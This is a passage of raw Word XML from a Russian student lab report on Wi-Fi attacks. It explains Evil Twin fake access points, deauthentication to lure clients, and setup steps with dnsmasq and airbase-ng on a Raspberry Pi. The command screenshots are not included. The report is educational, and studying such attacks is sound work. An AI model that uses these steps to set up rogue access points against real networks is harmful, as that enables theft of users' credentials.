          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="162C66B4" wp14:editId="406CCC66">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>635</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6120130" cy="2842895"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides" distT="0" distB="0" distL="0" distR="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20130" cy="2842895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="45035197" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:spacing w:before="57" w:after="57"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Получаем предупреждение о том, что следующие процессы (номера 384, 463 и 551) могут помешать работе адаптера в режиме мониторинга, однако в нашей ситуации мы пока не будем их убивать, так как иначе отключится и внешний Wi-Fi адаптер, через который производится управление системой. Внизу вывода видим, что для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>wlan1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> был включен режим мониторинга и теперь мы к этому интерфейсу должны обращаться по имени </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>wlan1mon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5DE97F" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:spacing w:before="57" w:after="57"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Практическая часть работы была </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>разделена между нами</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> на 3 части: каждый из участников команды выполнял свою задачу. Моей задачей было изучение создания поддельной точки доступа и написание скрипта, упрощающего её создание.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD3663B" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Fake</w:t>
      </w:r>
      <w:r w:rsidRPr="00454A19">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Access</w:t>
      </w:r>
      <w:r w:rsidRPr="00454A19">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Point</w:t>
      </w:r>
      <w:r w:rsidRPr="00454A19">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AP</w:t>
      </w:r>
      <w:r w:rsidRPr="00454A19">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>поддельная точка доступа</w:t>
      </w:r>
      <w:r w:rsidRPr="00454A19">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – это вид беспроводной атаки в которой атакующий, используя определённое программное обеспечение создаёт вредоносную точку доступа, которую будут видеть клиенты, находящиеся в поисках </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Wi</w:t>
      </w:r>
      <w:r w:rsidRPr="00454A19">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Fi</w:t>
      </w:r>
      <w:r w:rsidRPr="00454A19">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">сети. В большинстве случаев атакующий создаёт фейковую </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AP</w:t>
      </w:r>
      <w:r w:rsidRPr="00F252BB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>для кражи имени пользовательской информации (имя</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA7D51">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">пароль). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE356F2" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>Одним из самых популярных видов атак с помощью</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE43FD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Fake</w:t>
      </w:r>
      <w:r w:rsidRPr="007621B4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AP</w:t>
      </w:r>
      <w:r w:rsidRPr="007621B4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">является атака, при которой злоумышленник имитирует конфигурацию подлинной </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">точки доступа для создания практически идентичной </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. При таком типе атаки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Fake</w:t>
      </w:r>
      <w:r w:rsidRPr="008C390D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AP</w:t>
      </w:r>
      <w:r w:rsidRPr="008C390D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">называется </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Evil</w:t>
      </w:r>
      <w:r w:rsidRPr="008C390D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Twin</w:t>
      </w:r>
      <w:r w:rsidRPr="008C390D">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:t>с англ. Злой Близнец</w:t>
      </w:r>
      <w:r w:rsidRPr="008C390D">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. В таком случае </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ESSID</w:t>
      </w:r>
      <w:r w:rsidRPr="00211394">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(название) точек доступа полностью совпадают. Так же могут совпадать и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BSSID</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MAC</w:t>
      </w:r>
      <w:r w:rsidRPr="0033540D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>адрес)</w:t>
      </w:r>
      <w:r w:rsidRPr="0033540D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">и тип шифрования, если они известны злоумышленнику. Эти атаки являются особо неприятными из-за того, что устройства запоминают предыдущие </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Wi</w:t>
      </w:r>
      <w:r w:rsidRPr="00643B09">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Fi</w:t>
      </w:r>
      <w:r w:rsidRPr="00643B09">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>сети, к которым они подключались. Поэтому, если, к примеру, устройство когда-либо подключалось к сети «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Aboba</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">», оно всегда будет автоматически подключаться к любой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Wi</w:t>
      </w:r>
      <w:r w:rsidRPr="005F7708">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Fi</w:t>
      </w:r>
      <w:r w:rsidRPr="005F7708">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>сети с тем же именем сети, независимо от того являются ли они одной и той же сетью.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8B45DF" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Злоумышленник часто отключает клиентов от сети, к которой он подключен, с помощью атаки типа Деаутентификации (подробнее об этой атаки см. другие отчёты), повышает силу сигнала своей </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Fake</w:t>
      </w:r>
      <w:r w:rsidRPr="00B7796B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и побуждает клиентов присоединиться к ней.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123A14A3" w14:textId="2345F002" w:rsidR="00752B7C" w:rsidRPr="00752B7C" w:rsidRDefault="00CB3331" w:rsidP="00752B7C">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc75213387"/>
      <w:r w:rsidRPr="00A5090B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Создание </w:t>
      </w:r>
      <w:r w:rsidRPr="00A5090B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Fake</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB3331">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A5090B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="47A212FA" w14:textId="7C39F656" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Для того, чтобы наша точка доступа была полноценной </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Wi</w:t>
      </w:r>
      <w:r w:rsidRPr="0028145E">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Fi</w:t>
      </w:r>
      <w:r w:rsidRPr="0028145E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">точкой с возможностью выхода в интернет (например, это нужно для атак, перенаправляющих на фейковые сайты), нам необходимо настроить на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RaspberryPi</w:t>
      </w:r>
      <w:r w:rsidRPr="0028145E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="0028145E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">сервер и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DHCP</w:t>
      </w:r>
      <w:r w:rsidRPr="0028145E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">сервер. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DHCP</w:t>
      </w:r>
      <w:r w:rsidRPr="00571D24">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">сервер необходим для раздачи </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00571D24">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">адресов нашим клиентам, а </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="00571D24">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">необходим для того, чтобы клиенты могли выходить в интернет (для разрешения доменных имён). Для этого нам необходима утилита </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dnsmasq</w:t>
      </w:r>
      <w:r w:rsidR="00447EAA">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00752B7C">
        <w:t xml:space="preserve"> Устанавливаем </w:t>
      </w:r>
      <w:r w:rsidR="00752B7C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dnsmasq</w:t>
      </w:r>
      <w:r w:rsidR="00752B7C" w:rsidRPr="00752B7C">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00752B7C">
        <w:t xml:space="preserve">все последующие скриншоты были сняты </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00752B7C">
        <w:t>с виртуальной машины</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00752B7C">
        <w:t xml:space="preserve"> на которой стоит </w:t>
      </w:r>
      <w:r w:rsidR="00752B7C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:r w:rsidR="00752B7C" w:rsidRPr="00752B7C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00752B7C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidR="00FB0E23">
        <w:t xml:space="preserve">, впоследствие итоговый скрипт был перенесён на </w:t>
      </w:r>
      <w:r w:rsidR="00FB0E23">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RaspberryPi</w:t>
      </w:r>
      <w:r w:rsidR="00752B7C" w:rsidRPr="00752B7C">
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204598B6" w14:textId="43059A1F" w:rsidR="00752B7C" w:rsidRDefault="00752B7C" w:rsidP="00752B7C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C43EECD" wp14:editId="252CEAA4">
            <wp:extent cx="5940425" cy="9556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55675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F681E2" w14:textId="46048D94" w:rsidR="00C0341F" w:rsidRDefault="00C0341F" w:rsidP="00C0341F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37B84D1E" w14:textId="3CA893B0" w:rsidR="00C0341F" w:rsidRDefault="00C0341F" w:rsidP="00C0341F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Создаём файл для конфигурации </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dnsmasq</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0341F">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A36A56C" w14:textId="50F1CB0A" w:rsidR="00C0341F" w:rsidRDefault="00C0341F" w:rsidP="00C0341F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BF25957" wp14:editId="7B5A440E">
            <wp:extent cx="3381375" cy="228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228600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="67072582" w14:textId="0E985645" w:rsidR="00C0341F" w:rsidRDefault="00C0341F" w:rsidP="00C0341F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Пишем в нём следующее</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0532531C" w14:textId="7314EBA2" w:rsidR="00C0341F" w:rsidRDefault="000D7087" w:rsidP="00C0341F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="105DA918" wp14:editId="742CBB28">
            <wp:extent cx="3829050" cy="1809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1809750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A09AAB" w14:textId="22E2D46E" w:rsidR="000D7087" w:rsidRPr="000D71EC" w:rsidRDefault="000D7087" w:rsidP="00C0341F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>Первая строка означает интерфейс, который будет отвечать за интерфейс фейковой точки</w:t>
      </w:r>
      <w:r w:rsidR="000D71EC">
        <w:t xml:space="preserve">, в данном случае это </w:t>
      </w:r>
      <w:r w:rsidR="000D71EC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>at</w:t>
      </w:r>
      <w:r w:rsidR="000D71EC" w:rsidRPr="000D71EC">
        <w:t>0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBD4389" w14:textId="2B7827DA" w:rsidR="00F1465A" w:rsidRDefault="00F1465A" w:rsidP="00C0341F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Вторая строка задаёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r w:rsidRPr="00F1465A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>адреса, которые могут раздаваться полученным клиентам.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9D9AE8" w14:textId="203AABDE" w:rsidR="001665E2" w:rsidRDefault="001665E2" w:rsidP="00C0341F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>3-4</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> строки задают</w:t>
      </w:r>
      <w:r w:rsidRPr="00A211B8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>основной шлюз (наша машина).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E03746" w14:textId="6DA4ACD1" w:rsidR="00A211B8" w:rsidRDefault="00A211B8" w:rsidP="00C0341F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>5-8</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> строки задают </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r w:rsidRPr="00A211B8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">адреса публичных </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A211B8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>серверов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6186CCED" w14:textId="3C54392C" w:rsidR="006555D1" w:rsidRDefault="006555D1" w:rsidP="00C0341F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">После настройки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dnsmasq</w:t>
      </w:r>
      <w:r w:rsidRPr="006555D1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">мы можем запускать нашу </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Fake</w:t>
      </w:r>
      <w:r w:rsidRPr="006555D1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ap</w:t>
      </w:r>
      <w:r w:rsidRPr="006555D1">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Для этого используется утилита </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>airbase</w:t>
      </w:r>
      <w:r w:rsidRPr="006555D1">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ng</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, входящая в состав </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>aircrack</w:t>
      </w:r>
      <w:r w:rsidRPr="006555D1">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ng</w:t>
      </w:r>
      <w:r w:rsidR="004C5B0D" w:rsidRPr="004C5B0D">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0622319E" w14:textId="1B4999E6" w:rsidR="004C5B0D" w:rsidRDefault="002D4F6B" w:rsidP="00C0341F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="208D2260" wp14:editId="616C857B">
            <wp:extent cx="4724400" cy="1076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1076325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A1DAB4" w14:textId="01D645A7" w:rsidR="002D4F6B" w:rsidRDefault="00DC1B5E" w:rsidP="00C0341F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1B5E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">параметр означает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ESSID</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1B5E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>создаваемой точки.</w:t>
      </w:r>
      <w:r w:rsidR="000658ED">
        <w:t xml:space="preserve"> К примеру, если мы создаём </w:t>
      </w:r>
      <w:r w:rsidR="000658ED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Evil</w:t>
      </w:r>
      <w:r w:rsidR="000658ED" w:rsidRPr="000658ED">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000658ED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Twin</w:t>
      </w:r>
      <w:r w:rsidR="000658ED" w:rsidRPr="000658ED">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="000658ED">
        <w:t xml:space="preserve">мы можем перед этим воспользоваться командой </w:t>
      </w:r>
      <w:r w:rsidR="000658ED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>airodump</w:t>
      </w:r>
      <w:r w:rsidR="000658ED" w:rsidRPr="000658ED">
        <w:t>-</w:t>
      </w:r>
